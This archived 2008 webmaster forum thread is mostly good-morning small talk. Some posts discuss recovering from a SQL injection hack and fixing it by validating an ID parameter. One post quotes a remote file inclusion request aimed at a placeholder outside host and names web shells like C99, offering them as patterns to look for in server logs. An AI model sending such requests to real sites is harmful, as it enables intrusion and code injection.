Greenguy's Board

Greenguy's Board (http://www.greenguysboard.com/board/index.php)
-   Chit Chat (http://www.greenguysboard.com/board/forumdisplay.php?f=12)
-   -   Happy Wednesday Morning (http://www.greenguysboard.com/board/showthread.php?t=47255)

bluebrit 2008-05-28 06:28 AM

Happy Wednesday Morning
 
So, Its hump day and rather than taking advantage of that fact, here I am opening the good morning thread at 6.20am

Why am I up you ask?? well guess who woke up, looked at the clock and in a blurry half asleep state thought it said 09.43 rather than 05.43.

Now i'm up, dressed and creeping round Greenies kitchen making coffee, hoping i don't wake anybody :D

Whatever kind of hump day you all have, I hope its a good one, now go out n make money or something |thumb

Toby 2008-05-28 06:38 AM

Mornin' y'all,

Not sure WTF I'm doing up this early. Woke up needing to visit the little webmasters room, then couldn't get back to sleep.

One of my few remaining mainstream clients suffered an SQL injection hack into their content management database within the last few days. I spent most of yesterday afternoon/evening removing the injected javascript snippet. Today's task is locating the security hole that allowed the hack and closing it.

|coffee is on, help yourself...

JackDaniel's 2008-05-28 07:37 AM

Good Morning Everyone |waves|

spacemanspiff 2008-05-28 07:38 AM

Kind of off the "good morning" topic, but I'd be really interested to know how that works out Toby. I've got some SQL databases running on some of our mainstream stuff so I'm always looking out for that kind of stuff.

T Pat 2008-05-28 07:49 AM

Mornin All
I have to figure out how I screwed up a script today, then the regular crap
Coffee's On

Jim 2008-05-28 07:50 AM

Good Morning
Surprise...another long night. :(
Have a good day.

ArtWilliams 2008-05-28 07:55 AM

Good morning everyone. It looks like I might have a day 100% devoted to selling porn. That's great. I hope you have a great one!

MrMaryLou 2008-05-28 08:03 AM

Good Morning All :)

digifan 2008-05-28 08:23 AM

Good morning!

my long waited gallery making script is up and running, now lost my icq connnection so part of the setup has yet to be checked/done. I got adium installed too but it won't load work without the icq pass and icq.com is giving me time-outs, 500 errors and such. Some people rely on icq only.
I hear you Jim... :( and remember.

Have a good day.

terry 2008-05-28 08:35 AM

Good Morning and Happy Wednesday everyone!

Looks like I'll be working on some mainstream projects today and hopefully get some yard work done.

Have a good one!

stuveltje 2008-05-28 08:52 AM

morning all:) its 2:48 and i didnt sleep last night, i ate 8 asprines and still my jaw was killing.
So this early morning me went to the dentist, finally the fucker noticed that my jaw was inflamed.so my pain wasnt because i grind my teeth, i have a bad dentist!......so he went thru the bugger tooth into a part of my jaw to open the place where it was inflamed, he used strange long things but if i am right he cleaned it up a bit, so now i got for 7 days antibiotics and still some pain in my jaw and my cheek and my nose|cry|........yeah the painkiller is almost done working...going to bed early!
I wish you all a great day and eve|waves|

Ramster 2008-05-28 09:06 AM

Good Morning.

The usual for me I guess... Making porn :)

bluemoney 2008-05-28 09:23 AM

Okay I'm up and dragging ass!

Plenty of coffee I see, have a groovy day!

Linkster 2008-05-28 09:31 AM

Good morning - up early to get off to Kings Canyon Natl Park for 5 days of backpacking and camping - forcast tonight snow showers and crown and tequila :)

Will post pics when I get pack

cd34 2008-05-28 09:46 AM

Today is deciphering yesterday's math. Evidently:

1+1=.9
1+2=4

Not quite the result I was expecting, but, promising nonetheless. After I figure out whether it is worth figuring out the results above, I get to fix 3 bugs in Apache's code. Thank goodness for open source.

SQL Injection attacks are probably 10% of the exploits we see. Probably 80% are XSS attacks which might be a little more likely if template files have been adjusted, but, it depends a lot on the CMS. Since the template files for most CMSs that are web administered are files on the disk that need to be writeable by the apache process, you might find that the attack came through XSS -- especially if you aren't finding new username's in your database that are admins or user's that cannot log in. If you've got access to the raw logs, take a look at them to see if you see any urls like "GET /includes/database.php?includefile=http://someremotesitehostingxss.com/blah.jpg?"

If you see something like that, then you need to search your system for popular web shell programs like C99, angelshell, etc.

Tekster 2008-05-28 09:54 AM

Good Morning,

Finally getting back into the swing of things, making the porn that is. Hope to get some stuff done and shorten my to do list.
Expected over 100 degrees for the next 10 days, so it looks like summer is here. :(

Cleo 2008-05-28 09:54 AM

Got my blood sucked first thing this morning and now espresso is on.

I took over doing the updates for FoxyAngel so I've been doing a lot of cleanup plus updating the tour trailers and all the other grunt work. Other than that just another boring day of more of the same.

JustRobert 2008-05-28 10:00 AM

Good Morning :)
Bunch of work and thats about it.

LeRoy 2008-05-28 10:01 AM

Good morning everyone. More freesites and some updating. A lot of tech issues going on here. Hope everyone has a good day.

Preacher 2008-05-28 10:28 AM

I'm hoping my computer comes in today or tomorrow, I really need a box that I can use all day long! |thumb

Toby 2008-05-28 10:58 AM

Quote:

Originally Posted by spacemanspiff (Post 403553)
Kind of off the "good morning" topic, but I'd be really interested to know how that works out Toby. I've got some SQL databases running on some of our mainstream stuff so I'm always looking out for that kind of stuff.

This particular hack has been a pretty prevalent recently. Over 1.5 million pages affected...

In this case it was on a Windoze box running ASP code on a huge site initially created by someone else 6 or 7 years ago. Any page that pulls dynamic content based on URL parameters is susceptible IF those parameters aren't properly validated before being used to query the database.

The solution in this case was relatively simple. Since the parameter is the index number for the specific page (ex: detail.asp?ID=69) all that has to be done is to convert the parameter value to a long integer before using it in the query string. The ASP function CLng does the job.

Greenguy 2008-05-28 10:58 AM

Good Hump Day Everyone |haha

I've been up since about 6:30 as I heard noise coming from my kitchen |couch|

Actually, I slept until 8:19 and I know this because that's when the phone rang. I have no idea why normal people think 8:00 AM is the time when it's ok to make phone calls |crazy|

Other than that, it's more banner rotating for me today |thumb

docholly 2008-05-28 11:13 AM

Morning..
trying to recover from being away for 4 days and only doing online stuff that I wanted to do..not had to do. now the "have to do" list is so long I can't see the end.

Finals are this week.. and RugDawg was up all night cramming. his Organic Chemistry exam is this afternoon.. no wonder school is for the young..

|thumb try to have a Happy Humping day.. |Jim always wishing you and Victoria a restful peaceful day.

papagmp 2008-05-28 12:48 PM

Morning - arrrrgggg - I hate mornings

bDok 2008-05-28 01:33 PM

Morning. I need to make more coffee. So tired as of late. I blame the weather. **shakes fist at sky**

Some more data entry today along with working more on some code for a site.

Cheers,
B


All times are GMT -4. The time now is 05:09 PM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc